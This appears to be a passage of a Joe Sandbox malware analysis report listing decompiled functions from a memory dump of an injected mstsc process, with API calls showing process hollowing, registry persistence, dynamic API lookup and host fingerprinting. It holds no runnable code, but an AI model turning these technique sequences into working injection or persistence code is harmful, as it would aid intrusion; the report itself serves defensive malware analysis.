GetProcessHeap.KERNEL32(00000008,00000039,00020019), ref: 00063ED2
HeapAlloc.KERNEL32(00000000), ref: 00063ED9
GetTickCount.KERNEL32 ref: 00063EED
wsprintfW.USER32 ref: 00063F24
GetProcessHeap.KERNEL32(00000008,00000019), ref: 00063F6E
HeapAlloc.KERNEL32(00000000), ref: 00063F71
GetCaretBlinkTime.USER32 ref: 00063F86
wsprintfW.USER32 ref: 00063FC8
RegQueryValueExW.ADVAPI32(00000000,?,00000000,00000003,00000000,?,00020019), ref: 0006401D
GetProcessHeap.KERNEL32(00000008,?), ref: 0006402C
HeapAlloc.KERNEL32(00000000), ref: 0006402F
RegQueryValueExW.ADVAPI32(?,?,00000000,00000003,00000000,?), ref: 00064051
RegCloseKey.ADVAPI32(?), ref: 00064077
GetProcessHeap.KERNEL32(00000008,?), ref: 00064099
HeapAlloc.KERNEL32(00000000), ref: 0006409C
GetProcessHeap.KERNEL32(00000000,00000000,00000000), ref: 000640AE
HeapReAlloc.KERNEL32(00000000), ref: 000640B1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 000640D5
HeapFree.KERNEL32(00000000), ref: 000640D8
GetProcessHeap.KERNEL32(00000000,00000000,00020019), ref: 000640E4
HeapFree.KERNEL32(00000000), ref: 000640ED
RegCloseKey.ADVAPI32(?), ref: 000640FC
GetProcessHeap.KERNEL32(00000000,?), ref: 00064107
HeapFree.KERNEL32(00000000), ref: 0006410A
GetProcessHeap.KERNEL32(00000000,00000000,00020019), ref: 00064112
HeapFree.KERNEL32(00000000), ref: 00064115

Strings

*I>5, xrefs: 00063EB2
68oLRM, xrefs: 00063FA3
WKIY5, xrefs: 00063F0A
QWKI, xrefs: 00063EC0
2KlY, xrefs: 00063EB9
5K Y[W*I+5.K, xrefs: 00063EE3

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 00067C11, Relevance: 54.6, APIs: 27, Strings: 4, Instructions: 374

APIs

GetProcessHeap.KERNEL32(00000008,0000000B,00000000,?,00000002), ref: 00067C57
HeapAlloc.KERNEL32(00000000,?,00000002), ref: 00067C5A
GetShellWindow.USER32 ref: 00067C6F
GetProcessHeap.KERNEL32(00000008,00000022,?,00000002), ref: 00067CF0
HeapAlloc.KERNEL32(00000000,?,00000002), ref: 00067CF3
GetProcessWindowStation.USER32 ref: 00067D08
GetModuleHandleA.KERNEL32(?,?,00000002), ref: 00067D47
GetProcAddress.KERNEL32(00000000,00000000,?,00000002), ref: 00067D70
GetModuleHandleA.KERNEL32(?,?,00000002), ref: 00067D86
GetProcessHeap.KERNEL32(00000008,00000022,?,00000002), ref: 00067DED
HeapAlloc.KERNEL32(00000000,?,00000002), ref: 00067DF0
GetProcessWindowStation.USER32 ref: 00067E02
GetProcAddress.KERNEL32(00000000,?,00000002), ref: 00067E31
GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 00067E3F
HeapFree.KERNEL32(00000000,?,00000002), ref: 00067E42

Part of subcall function 000674D8: GetProcessHeap.KERNEL32(00000008,00000010,00000000,?,00000000), ref: 0006752D
Part of subcall function 000674D8: HeapAlloc.KERNEL32(00000000), ref: 00067530
Part of subcall function 000674D8: GetMessageTime.USER32 ref: 00067544
Part of subcall function 000674D8: GetProcessHeap.KERNEL32(00000008,0000000E), ref: 0006759E
Part of subcall function 000674D8: HeapAlloc.KERNEL32(00000000), ref: 000675A1
Part of subcall function 000674D8: IsSystemResumeAutomatic.KERNEL32 ref: 000675B5
Part of subcall function 000674D8: GetModuleHandleA.KERNEL32(00000000,?), ref: 000675E6
Part of subcall function 000674D8: GetProcAddress.KERNEL32(00000000), ref: 000675ED
Part of subcall function 000674D8: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00067601
Part of subcall function 000674D8: HeapFree.KERNEL32(00000000), ref: 0006760A
Part of subcall function 000674D8: GetProcessHeap.KERNEL32(00000000,?), ref: 0006760F
Part of subcall function 000674D8: HeapFree.KERNEL32(00000000), ref: 00067612
Part of subcall function 000674D8: OpenProcess.KERNEL32(00000400,00000000,?,00000000), ref: 0006762E
Part of subcall function 000674D8: IsWow64Process.KERNELBASE(00000000,00000000), ref: 0006763F
Part of subcall function 000674D8: CloseHandle.KERNEL32(00000000), ref: 0006764D

GetProcessHeap.KERNEL32(00000008,00000200,?,00000002), ref: 00067E89
HeapAlloc.KERNEL32(00000000,?,00000002), ref: 00067E8C
GetProcessHeap.KERNEL32(00000008,00000100,?,00000002), ref: 00067EA4
HeapAlloc.KERNEL32(00000000,?,00000002), ref: 00067EA7
HeapFree.KERNEL32(00000000,?,00000002), ref: 00068082

Part of subcall function 00067A57: GetCurrentProcessId.KERNEL32(00000000,?,00000000), ref: 00067A81
Part of subcall function 00067A57: GetProcessHeap.KERNEL32(00000008,0000000B,00000000,?,00000000), ref: 00067AC1
Part of subcall function 00067A57: HeapAlloc.KERNEL32(00000000), ref: 00067AC8
Part of subcall function 00067A57: GetShellWindow.USER32 ref: 00067ADF
Part of subcall function 00067A57: GetProcessHeap.KERNEL32(00000008,0000001C), ref: 00067B50
Part of subcall function 00067A57: HeapAlloc.KERNEL32(00000000), ref: 00067B57
Part of subcall function 00067A57: DestroyCaret.USER32 ref: 00067B6D
Part of subcall function 00067A57: GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00067B9E
Part of subcall function 00067A57: GetProcAddress.KERNEL32(00000000), ref: 00067BA5
Part of subcall function 00067A57: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00067BB4
Part of subcall function 00067A57: HeapFree.KERNEL32(00000000), ref: 00067BC1
Part of subcall function 00067A57: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00067BC5
Part of subcall function 00067A57: HeapFree.KERNEL32(00000000), ref: 00067BCC
Part of subcall function 00067A57: CloseHandle.KERNEL32(00000002), ref: 00067C02

GetProcessHeap.KERNEL32(00000000,76E6FE8D,?,00000002), ref: 00068065
HeapFree.KERNEL32(00000000,?,00000002), ref: 0006806C
GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 0006807F
GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 000680B5
HeapFree.KERNEL32(00000000,?,00000002), ref: 000680BE
GetProcessHeap.KERNEL32(00000000,?,?,00000002), ref: 000680C3
HeapFree.KERNEL32(00000000,?,00000002), ref: 000680C6

Strings

'5, xrefs: 00067C46
EpvAqf, xrefs: 0006809F, 00067F6F
5WGK5, xrefs: 00067C8C
[##', xrefs: 00067C38

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 00069C2E, Relevance: 54.6, APIs: 27, Strings: 4, Instructions: 355

APIs

GetProcessHeap.KERNEL32(00000008,00000208,?,00000000,76E6FE8D), ref: 00069C4C
HeapAlloc.KERNEL32(00000000), ref: 00069C59
GetProcessHeap.KERNEL32(?,?,?,?,?,?,00000008,?,?,0000005D), ref: 00069D22
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,00000008,?,?,0000005D), ref: 00069D29
GetProcessHeap.KERNEL32(?,?,?,?,?,?,00000008,?,?,0000005D), ref: 00069D43
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104,?,?,?,?,?,?,00000008,?,?,0000005D), ref: 00069D74
lstrcatW.KERNEL32(?,?), ref: 00069D85
lstrcatW.KERNEL32(?,00070518), ref: 00069D8D
lstrcatW.KERNEL32(?,?), ref: 00069D93
lstrcatW.KERNEL32(?,00070520), ref: 00069D9B
Sleep.KERNEL32(000003E8,?,?,?,?,?,?,00000008,?,?,0000005D), ref: 00069DAA
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,0800000C,00000000,00000000,?,?), ref: 00069DCB
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,00000008,?,?,0000005D), ref: 00069DD4
HeapFree.KERNEL32(00000000), ref: 00069DDB
GetThreadContext.KERNEL32(?,00010002), ref: 00069E05
HeapFree.KERNEL32(00000000), ref: 0006A0DD

Part of subcall function 0006F995: GetProcessHeap.KERNEL32(00000008,0000000B,76E2204D,00000000,?), ref: 0006F9F1
Part of subcall function 0006F995: HeapAlloc.KERNEL32(00000000), ref: 0006F9F4
Part of subcall function 0006F995: GetShellWindow.USER32 ref: 0006FA08
Part of subcall function 0006F995: GetProcessHeap.KERNEL32(00000008,00000011), ref: 0006FA67
Part of subcall function 0006F995: HeapAlloc.KERNEL32(00000000), ref: 0006FA6A
Part of subcall function 0006F995: GetCapture.USER32 ref: 0006FA7E
Part of subcall function 0006F995: GetModuleHandleA.KERNEL32(?,00000000), ref: 0006FAAF
Part of subcall function 0006F995: GetProcAddress.KERNEL32(00000000), ref: 0006FAB6
Part of subcall function 0006F995: CloseHandle.KERNEL32(00000000), ref: 0006FB4A
Part of subcall function 0006F995: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006FB59
Part of subcall function 0006F995: HeapFree.KERNEL32(00000000), ref: 0006FB62
Part of subcall function 0006F995: GetProcessHeap.KERNEL32(00000000,?), ref: 0006FB69
Part of subcall function 0006F995: HeapFree.KERNEL32(00000000), ref: 0006FB6C

SetLastError.KERNEL32(00000000), ref: 00069FC9
ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00069FF4
IsBadReadPtr.KERNEL32(EpiTo,00000001), ref: 0006A01C
IsBadReadPtr.KERNEL32(?,00000004), ref: 0006A038
WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0006A068
ResumeThread.KERNEL32(?), ref: 0006A07E
CloseHandle.KERNEL32(00000000), ref: 0006A0A2

Part of subcall function 0006F859: GetProcessHeap.KERNEL32(00000008,0000000B,76E2204D,00000000,?), ref: 0006F888
Part of subcall function 0006F859: HeapAlloc.KERNEL32(00000000), ref: 0006F88F
Part of subcall function 0006F859: GetShellWindow.USER32 ref: 0006F8A1
Part of subcall function 0006F859: GetProcessHeap.KERNEL32(00000008,00000016), ref: 0006F905
Part of subcall function 0006F859: HeapAlloc.KERNEL32(00000000), ref: 0006F90C
Part of subcall function 0006F859: CloseClipboard.USER32 ref: 0006F920
Part of subcall function 0006F859: LoadLibraryA.KERNEL32(?), ref: 0006F951
Part of subcall function 0006F859: GetProcAddress.KERNEL32(00000000), ref: 0006F958
Part of subcall function 0006F859: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006F971
Part of subcall function 0006F859: HeapFree.KERNEL32(00000000), ref: 0006F97E
Part of subcall function 0006F859: GetProcessHeap.KERNEL32(00000000,?), ref: 0006F983
Part of subcall function 0006F859: HeapFree.KERNEL32(00000000), ref: 0006F98A

Part of subcall function 0006F6F4: GetProcessHeap.KERNEL32(00000008,00000014,?,00000000,00000000), ref: 0006F74E
Part of subcall function 0006F6F4: HeapAlloc.KERNEL32(00000000), ref: 0006F751
Part of subcall function 0006F6F4: GetClipboardSequenceNumber.USER32 ref: 0006F766
Part of subcall function 0006F6F4: GetProcessHeap.KERNEL32(00000008,0000000B), ref: 0006F7B8
Part of subcall function 0006F6F4: HeapAlloc.KERNEL32(00000000), ref: 0006F7BB
Part of subcall function 0006F6F4: GetShellWindow.USER32 ref: 0006F7CF
Part of subcall function 0006F6F4: GetModuleHandleA.KERNEL32(00000000,?), ref: 0006F800
Part of subcall function 0006F6F4: GetProcAddress.KERNEL32(00000000), ref: 0006F807
Part of subcall function 0006F6F4: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006F835
Part of subcall function 0006F6F4: HeapFree.KERNEL32(00000000), ref: 0006F842
Part of subcall function 0006F6F4: GetProcessHeap.KERNEL32(00000000,?), ref: 0006F847
Part of subcall function 0006F6F4: HeapFree.KERNEL32(00000000), ref: 0006F84E

TerminateProcess.KERNEL32(?,00000000), ref: 0006A0B5
CloseHandle.KERNEL32(?), ref: 0006A0BF
CloseHandle.KERNEL32(?), ref: 0006A0C9
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006A0D6

Strings

piTo, xrefs: 0006A01E
Ep, xrefs: 00069D0E
EpiTo, xrefs: 0006A017, 0006A01B
o p, xrefs: 00069CF6

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 00063ADC, Relevance: 54.5, APIs: 25, Strings: 6, Instructions: 252

APIs

GetProcessHeap.KERNEL32(00000008,00000208,00000000), ref: 00063B01
HeapAlloc.KERNEL32(00000000), ref: 00063B04

Part of subcall function 00063950: GetVersion.KERNEL32(76E6FE8D,00000000,?), ref: 00063971
Part of subcall function 00063950: GetProcessHeap.KERNEL32(00000008,00000025), ref: 000639B0
Part of subcall function 00063950: HeapAlloc.KERNEL32(00000000), ref: 000639B7
Part of subcall function 00063950: GetCurrentProcessId.KERNEL32 ref: 000639C8
Part of subcall function 00063950: GetProcessHeap.KERNEL32(00000008,00000051), ref: 00063A72
Part of subcall function 00063950: HeapAlloc.KERNEL32(00000000), ref: 00063A79
Part of subcall function 00063950: GetForegroundWindow.USER32 ref: 00063A8A
Part of subcall function 00063950: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00063AC8
Part of subcall function 00063950: HeapFree.KERNEL32(00000000), ref: 00063ACF

Part of subcall function 000638F7: RegCreateKeyExW.ADVAPI32(80000001,00000000,00000000,00000000,00000000,0006131B,00000000,0006131B,00000000,00000001,?,0006131B,00020006), ref: 00063929
Part of subcall function 000638F7: RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,0006131B,0006131B,?,0006131B,00020006), ref: 0006393C

GetProcessHeap.KERNEL32(00000008,00000039,00020006), ref: 00063BC8
HeapAlloc.KERNEL32(00000000), ref: 00063BCB
GetTickCount.KERNEL32 ref: 00063BDF
wsprintfW.USER32 ref: 00063C16
GetProcessHeap.KERNEL32(00000008,00000019), ref: 00063C56
HeapAlloc.KERNEL32(00000000), ref: 00063C59
GetCaretBlinkTime.USER32 ref: 00063C6D
wsprintfW.USER32 ref: 00063CB2
RegDeleteValueW.ADVAPI32(?,?), ref: 00063CC5
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00063CD4
HeapFree.KERNEL32(00000000), ref: 00063CD7
GetProcessHeap.KERNEL32(00000008,00000019), ref: 00063D22
HeapAlloc.KERNEL32(00000000), ref: 00063D25
GetCaretBlinkTime.USER32 ref: 00063D39
wsprintfW.USER32 ref: 00063D7E
RegSetValueExW.ADVAPI32(?,?,00000000,00000003,00000000,?), ref: 00063DAE
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00063DC6
HeapFree.KERNEL32(00000000), ref: 00063DC9
RegCloseKey.ADVAPI32(?), ref: 00063DEA
GetProcessHeap.KERNEL32(00000000,?), ref: 00063DF5
HeapFree.KERNEL32(00000000), ref: 00063DF8
GetProcessHeap.KERNEL32(00000000,00000000,00020006), ref: 00063E04
HeapFree.KERNEL32(00000000), ref: 00063E07

Strings

2KlY, xrefs: 00063B96
5K Y[W*I+5.K, xrefs: 00063BD5
*I>5, xrefs: 00063B8F
QWKI, xrefs: 00063BB2
WKIY5, xrefs: 00063BFC
68oLRM, xrefs: 00063C83

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 0006D076, Relevance: 47.5, APIs: 17, Strings: 10, Instructions: 225

APIs

GetProcessHeap.KERNEL32(00000008,00000029), ref: 0006D0F6
HeapAlloc.KERNEL32(00000000), ref: 0006D0FD
GetCapture.USER32 ref: 0006D10F
WSAStartup.WS2_32(00000201,?), ref: 0006D147
GetProcessHeap.KERNEL32(00000008,0000000F), ref: 0006D1F5
HeapAlloc.KERNEL32(00000000), ref: 0006D1FC
GetCurrentThreadId.KERNEL32 ref: 0006D20E
wsprintfA.USER32 ref: 0006D241
Sleep.KERNEL32(-0000EA60,00000000,?,00000000,00000000), ref: 0006D2A1
GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000,00000000), ref: 0006D2CF
HeapFree.KERNEL32(00000000), ref: 0006D2D6

Part of subcall function 000647D4: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,76E6C570,0006D305,00000000,?,00000000,00000000), ref: 000647F4
Part of subcall function 000647D4: HeapFree.KERNEL32(00000000), ref: 000647F7
Part of subcall function 000647D4: GetProcessHeap.KERNEL32(00000008,?,?,00000000,76E6C570,0006D305,00000000,?,00000000,00000000), ref: 00064801
Part of subcall function 000647D4: HeapAlloc.KERNEL32(00000000), ref: 00064804

Part of subcall function 0006482B: GetProcessHeap.KERNEL32(00000000,?,?,00000000,0006318E,?,?,?,?,?,?,?,?,?,?,00062973), ref: 00064845
Part of subcall function 0006482B: HeapFree.KERNEL32(00000000,?,?), ref: 0006484C

GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000,00000000), ref: 0006D310
HeapFree.KERNEL32(00000000), ref: 0006D317
GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000,00000000), ref: 0006D326
HeapFree.KERNEL32(00000000), ref: 0006D32D
GetProcessHeap.KERNEL32(00000000,?), ref: 0006D33E
HeapFree.KERNEL32(00000000), ref: 0006D345

Strings

e{uz, xrefs: 0006D0D3
IFNoT, xrefs: 0006D12C
w_, xrefs: 0006D0E1
3h, xrefs: 0006D1E2
1/!&, xrefs: 0006D0A3
>"*#, xrefs: 0006D0B0
Zb~~, xrefs: 0006D0DA
3hc0, xrefs: 0006D0CC
T, xrefs: 0006D0E7
WhfZ7r, xrefs: 0006D224

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 0006E310, Relevance: 47.4, APIs: 20, Strings: 7, Instructions: 199

APIs

RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020119,0006E7ED,?), ref: 0006E39F
GetProcessHeap.KERNEL32(00000008,000000C8,774229EE,76E6FE8D), ref: 0006E3B7
HeapAlloc.KERNEL32(00000000), ref: 0006E3BE
RegQueryValueExA.ADVAPI32(0006E7ED,?,00000000,00000000,00000000,?), ref: 0006E3EB
RegQueryValueExA.ADVAPI32(0006E7ED,74736E49,00000000,00000000,?,00000004), ref: 0006E411
RegQueryValueExA.ADVAPI32(0006E7ED,49676552,00000000,00000000,?,00000004), ref: 0006E43F
GetTickCount.KERNEL32 ref: 0006E445
RegCloseKey.ADVAPI32(0006E7ED), ref: 0006E451
RegOpenKeyExA.ADVAPI32(80000002,?,00000000,0004001F,0006E7ED), ref: 0006E467
RegSetValueExA.ADVAPI32(0006E7ED,49676552,00000000,00000004,?,00000004), ref: 0006E482
RegCloseKey.ADVAPI32(0006E7ED), ref: 0006E499
lstrlenA.KERNEL32(00000008), ref: 0006E4A5
GetProcessHeap.KERNEL32(00000008,00000010), ref: 0006E4CB
HeapAlloc.KERNEL32(00000000), ref: 0006E4D2
GetComputerNameA.KERNEL32(00000000,00000004), ref: 0006E4DF
lstrlenA.KERNEL32(00000000), ref: 0006E4E6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006E503
HeapFree.KERNEL32(00000000), ref: 0006E510
GetProcessHeap.KERNEL32(00000000,?), ref: 0006E517
HeapFree.KERNEL32(00000000), ref: 0006E51E

Strings

ate, xrefs: 0006E382
tVer, xrefs: 0006E333
sion, xrefs: 0006E33D
allD, xrefs: 0006E37B
RegI, xrefs: 0006E389
Inst, xrefs: 0006E374
rren, xrefs: 0006E328

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 0006DAD5, Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 179

APIs

GetSystemTime.KERNEL32(?,00000000,?,00000000), ref: 0006DAF2
SystemTimeToFileTime.KERNEL32(?,?,0000003B), ref: 0006DBA6
SystemTimeToFileTime.KERNEL32(?,?), ref: 0006DBAD
SystemTimeToFileTime.KERNEL32(?,00000016), ref: 0006DBB6
GetProcessHeap.KERNEL32(00000008,00000069), ref: 0006DC31
HeapAlloc.KERNEL32(00000000), ref: 0006DC38
ReleaseCapture.USER32 ref: 0006DC47

Part of subcall function 0006D97F: ExpandEnvironmentStringsW.KERNEL32(00106D80,00000000,00000000,00106D80,00106D80,00106D80,00106D80,?,0006DA06,00072000,7142434B,00106D80,?,00061ADF,?), ref: 0006D991
Part of subcall function 0006D97F: GetProcessHeap.KERNEL32(00000008,00000000,?,0006DA06,00072000,7142434B,00106D80,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x), ref: 0006D9AB
Part of subcall function 0006D97F: HeapAlloc.KERNEL32(00000000,?,0006DA06,00072000,7142434B,00106D80,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006D9B2
Part of subcall function 0006D97F: ExpandEnvironmentStringsW.KERNEL32(00106D80,00000000,7142434B,00000000,?,0006DA06,00072000,7142434B,00106D80,?,00061ADF,?), ref: 0006D9CD
Part of subcall function 0006D97F: GetProcessHeap.KERNEL32(00000000,00000000,0006DA06,00072000,7142434B,00106D80,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006D9DA
Part of subcall function 0006D97F: HeapFree.KERNEL32(00000000,?,00061ADF), ref: 0006D9E1

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0006DC8F
GetFileTime.KERNEL32(00000000,?,?,00000016), ref: 0006DCAA
SystemTimeToFileTime.KERNEL32(?,?), ref: 0006DCBB
SystemTimeToFileTime.KERNEL32(?,?), ref: 0006DCC8
SystemTimeToFileTime.KERNEL32(?,00000016), ref: 0006DCD5
CloseHandle.KERNEL32(00000000), ref: 0006DCDC
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006DCE5
HeapFree.KERNEL32(00000000), ref: 0006DCEC
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006DCF5
HeapFree.KERNEL32(00000000), ref: 0006DCFC

Strings

2[e\, xrefs: 0006DC00
sV8K, xrefs: 0006DC07
2@eT, xrefs: 0006DC15
Us[8, xrefs: 0006DBC6
8W1/, xrefs: 0006DBF9
deBs, xrefs: 0006DBD4
28e1, xrefs: 0006DC26

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 00067A57, Relevance: 42.1, APIs: 14, Strings: 10, Instructions: 138

APIs

GetCurrentProcessId.KERNEL32(00000000,?,00000000), ref: 00067A81
GetProcessHeap.KERNEL32(00000008,0000000B,00000000,?,00000000), ref: 00067AC1
HeapAlloc.KERNEL32(00000000), ref: 00067AC8
GetShellWindow.USER32 ref: 00067ADF
GetProcessHeap.KERNEL32(00000008,0000001C), ref: 00067B50
HeapAlloc.KERNEL32(00000000), ref: 00067B57
DestroyCaret.USER32 ref: 00067B6D
GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00067B9E
GetProcAddress.KERNEL32(00000000), ref: 00067BA5
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00067BB4
HeapFree.KERNEL32(00000000), ref: 00067BC1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00067BC5
HeapFree.KERNEL32(00000000), ref: 00067BCC
CloseHandle.KERNEL32(00000002), ref: 00067C02

Strings

jsN8, xrefs: 00067B43
N, xrefs: 00067B3F
z-., xrefs: 00067B73
Ks, xrefs: 00067B4A
<E^!, xrefs: 00067B16
'5, xrefs: 00067AB0
#W9, xrefs: 00067B32
+Y/%, xrefs: 00067B1D
[##', xrefs: 00067AA2
\G, xrefs: 00067B39

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 00068761, Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 141

APIs

GetProcessHeap.KERNEL32(00000008,00000015,00000000,?,?), ref: 00068799
HeapAlloc.KERNEL32(00000000), ref: 0006879C
GetTickCount.KERNEL32 ref: 000687B8
GetProcessHeap.KERNEL32(00000008,0000000D), ref: 00068804
HeapAlloc.KERNEL32(00000000), ref: 00068807
GetCapture.USER32 ref: 00068819
GetProcessHeap.KERNEL32(00000008,0000000F), ref: 0006886A
HeapAlloc.KERNEL32(00000000), ref: 00068871
GetCursor.USER32 ref: 00068885
LoadLibraryA.KERNEL32(66713859), ref: 000688B6
GetProcAddress.KERNEL32(00000000), ref: 000688BD
GetProcessHeap.KERNEL32(00000000,00000000), ref: 000688DF
HeapFree.KERNEL32(00000000), ref: 000688EC
GetProcessHeap.KERNEL32(00000000,66713859), ref: 000688F7
HeapFree.KERNEL32(00000000), ref: 000688FA
GetProcessHeap.KERNEL32(00000000,?), ref: 00068901
HeapFree.KERNEL32(00000000), ref: 00068904

Strings

Y$i, xrefs: 000687F2
Hiyn, xrefs: 000687F9
&("(, xrefs: 00068849
Y8qf, xrefs: 0006878E
ZMyL, xrefs: 0006885D

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 0006FCD2, Relevance: 36.9, APIs: 13, Strings: 8, Instructions: 124

APIs

GetProcessHeap.KERNEL32(00000008,0000004D,00072000,7142434B,00106D80), ref: 0006FD46
HeapAlloc.KERNEL32(00000000), ref: 0006FD49
GetDialogBaseUnits.USER32 ref: 0006FD64
RegOpenKeyExW.ADVAPI32(?,00000000,00000000,000F003F,00000000), ref: 0006FD98
GetProcessHeap.KERNEL32(00000008,0000003D), ref: 0006FDFD
HeapAlloc.KERNEL32(00000000), ref: 0006FE00
CloseClipboard.USER32 ref: 0006FE14
RegSetValueExW.ADVAPI32(00000000,00000000,00000000,00000004,?,00000004), ref: 0006FE47
RegCloseKey.ADVAPI32(00000000), ref: 0006FE50
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006FE5F
HeapFree.KERNEL32(00000000), ref: 0006FE62
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006FE6E
HeapFree.KERNEL32(00000000), ref: 0006FE71

Strings

#c<j, xrefs: 0006FCFB
Qo1c, xrefs: 0006FD2C
%r?7, xrefs: 0006FDB3
?6r, xrefs: 0006FDBA
:jXo, xrefs: 0006FD1E
frK7, xrefs: 0006FDF0
6c'j, xrefs: 0006FD25
^o&c, xrefs: 0006FD17

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 0006D4CA, Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224

APIs

GetProcessHeap.KERNEL32(00000008,00000019), ref: 0006D50E
HeapAlloc.KERNEL32(00000000), ref: 0006D515
GetDesktopWindow.USER32 ref: 0006D524
CoInitialize.OLE32(00000000), ref: 0006D553
CoCreateInstance.OLE32(00070380,00000000,00000001,00070370,?), ref: 0006D572
StrStrIW.SHLWAPI(00000000), ref: 0006D634
StrStrIW.SHLWAPI(00000000,00000000), ref: 0006D668
StrStrIW.SHLWAPI(00000000,00000000), ref: 0006D6B3
StrCpyNW.SHLWAPI(?,00000002,-000000FE), ref: 0006D6D1
GetFileAttributesW.KERNEL32(?), ref: 0006D6DE
CoTaskMemFree.OLE32(00000000), ref: 0006D6FA
CoTaskMemFree.OLE32(00000000), ref: 0006D6FF
CoTaskMemFree.OLE32(00000001), ref: 0006D70B
CoTaskMemFree.OLE32(?), ref: 0006D71B
CoUninitialize.OLE32 ref: 0006D74C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006D754
HeapFree.KERNEL32(00000000), ref: 0006D75B

Strings

g1Q3, xrefs: 0006D503
nku, xrefs: 0006D5C0
Y, xrefs: 0006D50A

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 0006EA7F, Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 162

APIs

GetProcessHeap.KERNEL32(00000008,00000015,?,?,00000000), ref: 0006EB13
HeapAlloc.KERNEL32(00000000,?,00000000), ref: 0006EB16
GetTickCount.KERNEL32(?,00000000), ref: 0006EB2B
GetProcessHeap.KERNEL32(00000008,0000000B,?,00000000), ref: 0006EB76
HeapAlloc.KERNEL32(00000000,?,00000000), ref: 0006EB79
GetShellWindow.USER32 ref: 0006EB8D
LoadLibraryA.KERNEL32(00000000), ref: 0006EBBE
GetProcAddress.KERNEL32(00000000,?,00000000), ref: 0006EBC5
GetProcessHeap.KERNEL32(00000008,?,?,00000000), ref: 0006EBD6
HeapAlloc.KERNEL32(00000000,?,00000000), ref: 0006EBDD
GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 0006EC3C
HeapFree.KERNEL32(00000000,?,00000000), ref: 0006EC3F
GetProcessHeap.KERNEL32(00000000,?,?,00000000), ref: 0006EC48
HeapFree.KERNEL32(00000000,?,00000000), ref: 0006EC4B
GetProcessHeap.KERNEL32(00000000,?,?,00000000), ref: 0006EC5F
